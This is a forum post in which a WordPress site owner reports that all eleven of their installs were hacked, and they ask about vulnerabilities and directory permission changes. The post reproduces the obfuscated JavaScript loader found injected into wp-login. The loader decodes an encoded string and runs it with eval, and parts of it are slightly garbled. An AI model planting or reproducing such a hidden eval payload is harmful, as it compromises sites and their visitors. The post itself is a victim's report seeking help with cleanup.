Looks like at around 8:48AM this morning, someone got into my WordPress installs (all 11 of them, in my account), and managed to add code to wp-login:
script language=JavaScript>function hmlyban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,37,11,52,34,14,32,57,59,46,0,
0,0,0,0,0,13,28,60,23,2,39,5,61,44,29,26,53,25,12,22,10,6,8,7,51,35,54,9,27,
30,18,42,0,0,0,0,20,0,45,31,4,15,33,55,62,36,3,58,38,24,41,50,43,0,21,17,56,
16,40,19,48,1,47,49);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);
i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCo
i>de(1
55^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}hmlyban('H2bG0vd8K4g8j098uWOybvbGg
S2u0vdg9Wy0K0XaHE9By80HBXZBGE9gU809KoyGgWjZjfJZu92jmTym7508yyXu3Y2Zo2d0uCoBK
fdG3g5ahn2HNo08SCWj38XG0doKj0gBKk9gK0dGUdoHzkZZ4njunD2yoZbom4OywnW98n9B00gBk
4OZu98Bg2d0S09maUj9u09sf8ym7gyBuygGj2XuKvbGgEWmEYoBGE9gU8bmBO2')</script
Anyone know of any vulnerabilities? My directories were changed to 715 (I think my host did that) this morning, as well.
Anyone know what's going on? I deleted the code, and uploaded a clean copy, and am checking the rest of my directories for stuff changed this morning, as well.
dualtech